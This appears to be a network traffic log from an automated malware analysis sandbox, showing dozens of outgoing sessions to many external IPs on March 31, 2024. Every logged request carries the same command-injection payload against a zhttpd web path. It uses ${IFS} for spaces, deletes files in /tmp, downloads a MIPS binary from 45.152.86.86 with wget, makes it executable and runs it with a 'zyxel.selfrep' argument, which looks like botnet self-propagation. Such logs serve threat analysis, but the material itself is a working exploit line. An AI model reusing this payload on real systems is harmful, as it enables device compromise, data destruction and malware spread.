                                        Mar 31, 2024 09:21:44.140173912 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5668192.168.2.234922831.122.239.109443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.140197039 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5669192.168.2.2357872165.243.56.153443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.140237093 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5670192.168.2.234554012.114.113.193443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.140311003 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5671192.168.2.2355784211.246.104.224443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.140336990 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5672192.168.2.235148885.210.106.180443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.140378952 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5673192.168.2.2360912161.198.178.197443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.140455961 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5674192.168.2.235821440.110.244.243443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.140501022 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5675192.168.2.2354212102.75.233.205443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.140562057 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5676192.168.2.2337038180.210.21.60443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.140604973 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5677192.168.2.233785019.130.167.228443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.140666008 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5678192.168.2.2349198161.74.158.44443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.140727043 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5679192.168.2.235943643.231.197.2443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.140795946 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5680192.168.2.235014066.243.29.52443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.140839100 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5681192.168.2.2347568205.121.198.3443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.140899897 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5682192.168.2.2352278210.6.168.31443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.140938997 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5683192.168.2.233886643.204.166.242443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.140995979 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5684192.168.2.2345132207.18.47.254443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.141051054 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5685192.168.2.2355034161.113.105.85443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.141087055 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5686192.168.2.2358638152.232.164.147443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.141149998 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5687192.168.2.233982252.43.20.77443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.141256094 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5688192.168.2.2354580175.214.0.54443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.141287088 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5689192.168.2.2353086199.243.183.193443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.141340017 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5690192.168.2.2347116208.228.219.53443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.141386032 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5691192.168.2.2349738162.53.64.199443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.141427040 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5692192.168.2.234184268.255.153.245443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.141514063 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5693192.168.2.2340414158.223.242.90443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.141554117 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5694192.168.2.2340972201.206.219.207443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.141619921 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5695192.168.2.233438096.223.143.112443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.141665936 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5696192.168.2.2333014149.151.65.145443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.141716957 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5697192.168.2.2350884148.36.84.143443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.141791105 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5698192.168.2.2345664160.84.132.127443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.141825914 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5699192.168.2.2335116111.199.217.84443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.141871929 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5700192.168.2.2338922198.24.175.215443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.141931057 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5701192.168.2.235481686.195.2.194443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.141980886 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5702192.168.2.2342778150.185.9.174443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.142030954 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5703192.168.2.2333732100.55.201.119443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.142088890 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5704192.168.2.2359706219.246.19.186443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.142124891 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5705192.168.2.234378883.157.173.201443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.142187119 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5706192.168.2.2332970188.121.239.191443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.142220020 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5707192.168.2.234481077.190.42.246443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.142285109 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5708192.168.2.2360910172.86.71.13443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.142318964 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5709192.168.2.2352906184.132.8.94443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.142427921 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5710192.168.2.2353630131.228.205.135443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.142466068 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5711192.168.2.2338758138.226.40.81443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.142509937 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5712192.168.2.2339486147.138.224.249443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.142563105 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5713192.168.2.2348492167.30.96.238443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.142616034 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5714192.168.2.2342646206.212.10.233443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.142663956 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5715192.168.2.2353552149.150.39.72443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.142739058 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5716192.168.2.2334400137.18.254.248443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.142805099 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5717192.168.2.2355878198.172.140.203443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.142858982 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5718192.168.2.2347748218.149.222.35443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.142920017 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5719192.168.2.23364302.210.132.11443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.142977953 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5720192.168.2.2354458146.21.39.168443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.143023014 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5721192.168.2.2343796169.79.89.176443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.143093109 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5722192.168.2.2348574142.49.247.75443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.143130064 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5723192.168.2.2350114119.136.138.134443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.143182039 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5724192.168.2.23424388.3.191.61443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.143225908 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5725192.168.2.2360226172.73.138.117443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.143284082 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5726192.168.2.2358854213.101.133.155443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.143317938 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5727192.168.2.2335238145.117.54.0443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.143368006 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5728192.168.2.2352832118.83.254.150443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.143429041 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5729192.168.2.234133219.67.210.219443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.143479109 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5730192.168.2.235792040.139.93.46443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.143542051 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5731192.168.2.2350862111.205.170.188443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.143591881 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5732192.168.2.2345004107.18.184.214443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.143651962 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5733192.168.2.2336320103.23.139.194443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.143702984 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5734192.168.2.234075862.121.131.54443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:44.143754959 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5735192.168.2.2356752162.239.131.135443
                                        TimestampBytes transferredDirectionData
